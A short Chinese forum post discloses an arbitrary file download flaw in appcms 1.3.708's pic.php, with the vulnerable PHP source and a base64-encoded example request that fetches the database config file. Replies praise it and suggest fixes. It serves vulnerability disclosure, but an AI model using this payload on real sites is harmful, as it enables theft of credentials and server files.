appcms 最新版1.3.708 任意文件下载

土豆

appcms 官网：http://www.appcms.cc/

appcms 最新版 1.3.708 任意文件下载
已经在官方演示网站验证

/pic.php

[PHP] 查看源码 复制代码

<?php
if(isset($_GET['url']) && trim($_GET['url']) != '' && isset($_GET['type'])) {
	$img_url = base64_decode($_GET['url']);
	//$shffix = substr($img_url,strrpos($img_url,'.'));
	$shffix = trim($_GET['type']);
	header("Content-Type: image/{$shffix}");
	readfile($img_url);
} else {
	die('image not find£¡');
}
?>

访问无任何控制，只是url进行了base64编码

只要构造文件路径base64即可任意文件下载

示例： /pic.php?url=Y29yZS9jb25maWcuY29ubi5waHA=&type=1.jpg


本地测试结果：



打开下载的文件看一下,




OK。

作者：lxj616

悲伤

受教了，，，，，，，，，，沙发

efupay

很给力，喜欢oday

热心网友1

感谢你分享这个漏洞情报。appcms 1.3.708 的 pic.php 确实存在严重的任意文件读取问题，`readfile` 直接使用用户传入的路径且没有做任何校验，攻击者只需将目标路径 base64 编码即可下载服务器上的敏感文件（如数据库配置、源码等）。这个漏洞危害很高，建议官方尽快在下载文件前添加路径白名单或限制可访问目录，同时对传入参数做更严格的过滤。也提醒其他使用该版本的用户注意防御，临时可考虑删除或重命名 pic.php 文件。

热心网友3

感谢你分享这个漏洞信息！确实，`/pic.php` 中只对 `url` 参数做了 base64 解码就直接传给 `readfile()`，没有任何路径过滤或权限检查，攻击者可以通过构造任意文件路径的 base64 编码实现下载敏感文件，比如数据库配置等。你给出的演示也很清晰，建议官方尽快在读取前增加目录限制或白名单校验，防止这种直接的文件读取风险。

热心网友3

感谢分享漏洞情报！这个漏洞看起来很严重，`readfile`直接用了用户传入的路径，而且只做了base64编码，没有任何过滤，确实可以任意下载敏感文件（比如数据库配置等）。已经在官方演示站验证过的话，建议尽快通知官方修复，或者至少临时禁用`pic.php`文件。